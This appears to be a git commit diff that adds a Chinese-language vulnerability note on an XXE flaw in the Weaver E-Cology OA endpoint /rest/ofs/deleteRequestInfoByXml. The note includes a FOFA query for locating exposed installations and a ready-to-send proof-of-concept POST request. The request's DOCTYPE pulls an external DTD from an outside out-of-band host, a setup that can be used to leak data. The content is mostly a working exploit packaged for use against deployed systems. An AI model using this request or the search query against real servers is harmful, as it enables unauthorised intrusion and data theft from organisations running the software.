整理文件

2024-08-21 15:08:43 +08:00
parent fcad930af3
commit 299ba35f30
1043 changed files with 0 additions and 3 deletions
--- a/泛微OA/泛微E-Cology系统接口deleteRequestInfoByXml存在XXE漏洞.md
+++ b/泛微OA/泛微E-Cology系统接口deleteRequestInfoByXml存在XXE漏洞.md
@@ -0,0 +1,23 @@
+# 泛微E-Cology系统接口deleteRequestInfoByXml存在XXE漏洞
+
+泛微e-cology是一款由泛微网络科技开发的协同管理平台，支持人力资源、财务、行政等多功能管理和移动办公。泛微e-cology系统接口`/rest/ofs/deleteRequestInfoByXml` 存在XXE漏洞
+
+## fofa
+
+```java
+app="泛微-协同商务系统"
+```
+
+## poc
+
+```java
+POST /rest/ofs/deleteRequestInfoByXml HTTP/1.1
+Host: 
+Content-Type: application/xml
+Content-Length: 131
+
+<?xml version="1.0" encoding="utf-8"?>
+<!DOCTYPE syscode SYSTEM "http://hsdtcwwetk.dgrh3.cn">
+<M><syscode>&send;</syscode></M>
+```
+